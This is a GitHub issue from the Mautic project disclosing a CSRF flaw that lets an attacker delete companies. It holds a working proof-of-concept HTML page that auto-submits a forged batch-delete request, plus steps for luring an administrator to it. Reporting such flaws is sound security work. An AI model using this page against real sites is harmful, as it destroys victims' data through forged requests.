### ISSUE TITLE
CSRF - Delete any one or more companies

### ISSUE THREAD

**Issue by ch1nhpd** [mautic/mautic#11649]
### Mautic Version

4.4.x series

### PHP version

8.0

### What browsers are you seeing the problem on?

Not relevant

### What happened?

Allows an attacker to delete one or more companies via the id.

### How can we reproduce this issue?

```html
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.86.21/s/companies/batchDelete?ids=[%221%22,%222%22,,%223%22]&mauticUserLastActive=16&mauticLastNotificationId=" method="POST">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
```

1. Create a website with the above content
2. Send it to admin
3. If admin click to the link -> companies deleted

### Code of Conduct

- [X] I confirm that I have read and agree to follow this project's Code of Conduct

**Comment by RCheesley** [comment]
Please report through the correct channels

**Comment by ch1nhpd** [comment]
https://huntr.dev/bounties/10e941ae-7008-4253-a23f-fdeaacd1afd8/
